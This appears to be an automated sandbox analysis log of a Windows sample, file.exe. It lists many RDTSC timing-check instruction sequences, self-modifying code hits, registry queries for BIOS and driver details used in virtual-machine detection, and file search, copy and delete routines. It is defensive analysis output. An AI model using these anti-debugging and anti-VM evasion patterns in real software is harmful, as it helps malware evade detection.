                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801892 second address: 801896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801896 second address: 8018AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edi 0x0000000a jnc 00007F402CDD4F62h 0x00000010 jne 00007F402CDD4F56h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801BAB second address: 801BB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801D31 second address: 801D3B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F402CDD4F56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801D3B second address: 801D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802580 second address: 802584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802584 second address: 80259B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F402CC7E511h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80259B second address: 8025BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jmp 00007F402CDD4F5Dh 0x0000000c push edx 0x0000000d pop edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802D57 second address: 802D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802D5D second address: 802D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F402CDD4F56h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F402CDD4F61h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80342F second address: 803440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F402CC7E506h 0x0000000a jg 00007F402CC7E506h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C05E second address: 80C074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F402CDD4F5Fh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C074 second address: 80C080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 js 00007F402CC7E506h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81AF96 second address: 81AF9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81AE87 second address: 81AE8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81E052 second address: 81E079 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F402CDD4F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F402CDD4F69h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81E079 second address: 81E0A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E50Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F402CC7E519h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81E1C4 second address: 81E1C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81E1C8 second address: 81E1CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823D73 second address: 823D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823D79 second address: 823D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F402CC7E50Eh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823D8C second address: 823DA9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F402CDD4F63h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823DA9 second address: 823DAF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823DAF second address: 823DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F402CDD4F66h 0x00000014 jnc 00007F402CDD4F56h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82DC36 second address: 82DC3C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83006E second address: 83007A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 835FC2 second address: 835FE3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F402CC7E517h 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 836557 second address: 83655F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 83655F second address: 836567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 836824 second address: 836842 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 836842 second address: 83685E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F402CC7E516h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8373B9 second address: 8373E0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F402CDD4F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F402CDD4F63h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84BFF4 second address: 84C013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 jmp 00007F402CC7E516h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84C013 second address: 84C02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jbe 00007F402CDD4F56h 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84C02B second address: 84C031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 74CFEC second address: 74CFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 85A17F second address: 85A1DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E50Ah 0x00000007 jc 00007F402CC7E506h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jbe 00007F402CC7E506h 0x00000016 jmp 00007F402CC7E514h 0x0000001b popad 0x0000001c pushad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 jmp 00007F402CC7E517h 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F402CC7E50Bh 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 85A1DA second address: 85A1E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 85A356 second address: 85A35C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 85A35C second address: 85A361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 85A361 second address: 85A368 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 868F0F second address: 868F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 868F15 second address: 868F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 869065 second address: 8690C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007F402CDD4F5Fh 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jnp 00007F402CDD4F56h 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F402CDD4F63h 0x0000001c jmp 00007F402CDD4F5Ch 0x00000021 popad 0x00000022 jmp 00007F402CDD4F5Fh 0x00000027 pushad 0x00000028 jnc 00007F402CDD4F56h 0x0000002e jo 00007F402CDD4F56h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8691F8 second address: 8691FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8691FC second address: 869200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 869200 second address: 86920E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F402CC7E506h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86920E second address: 869219 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 869219 second address: 86922B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007F402CC7E506h 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86922B second address: 869231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 869231 second address: 869237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86951E second address: 869526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86B60A second address: 86B62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jne 00007F402CC7E506h 0x0000000b jmp 00007F402CC7E518h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86E216 second address: 86E264 instructions: 0x00000000 rdtsc 0x00000002 js 00007F402CDD4F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007F402CDD4F63h 0x00000013 mov edx, dword ptr [ebp+122D2BC7h] 0x00000019 push 00000004h 0x0000001b mov dh, bl 0x0000001d call 00007F402CDD4F59h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F402CDD4F68h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86E264 second address: 86E2C4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F402CC7E51Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F402CC7E512h 0x00000011 jmp 00007F402CC7E519h 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jnc 00007F402CC7E50Ch 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86E2C4 second address: 86E2D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jc 00007F402CDD4F60h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86E2D9 second address: 86E2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86E2E7 second address: 86E2EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86FAD8 second address: 86FAE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jne 00007F402CC7E506h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86FAE6 second address: 86FAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86FAEC second address: 86FB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F402CC7E516h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007F402CC7E506h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86FB19 second address: 86FB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 871C8E second address: 871C9A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F402CC7E506h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 871C9A second address: 871CAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F402CDD4F56h 0x0000000a jns 00007F402CDD4F56h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 871CAA second address: 871CB8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 757026 second address: 757030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F402CDD4F56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 757030 second address: 75703C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75703C second address: 75706A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F402CDD4F66h 0x00000008 jbe 00007F402CDD4F56h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F402CDD4F5Ah 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75706A second address: 75706E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4ED02BB second address: 4ED031A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F402CDD4F60h 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F402CDD4F67h 0x0000001a sbb ah, FFFFFFBEh 0x0000001d jmp 00007F402CDD4F69h 0x00000022 popfd 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4ED031A second address: 4ED0371 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dx, ax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov esi, 30248F1Bh 0x00000011 jmp 00007F402CC7E510h 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 jmp 00007F402CC7E510h 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov edx, 664DAD30h 0x00000027 jmp 00007F402CC7E519h 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4ED03D2 second address: 4ED042B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F402CDD4F62h 0x00000009 or ch, FFFFFF98h 0x0000000c jmp 00007F402CDD4F5Bh 0x00000011 popfd 0x00000012 jmp 00007F402CDD4F68h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c jmp 00007F402CDD4F60h 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4ED042B second address: 4ED042F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4ED042F second address: 4ED0433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4ED0433 second address: 4ED0439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4ED0439 second address: 4ED043F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4ED043F second address: 4ED0443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7942B2 second address: 7942BC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F402CDD4F5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 762FD8 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7889D0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5DF0DE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7AD8D2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 811FB4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E109A rdtsc
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00394910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00394570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00393EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00381160 GetSystemInfo,ExitProcess
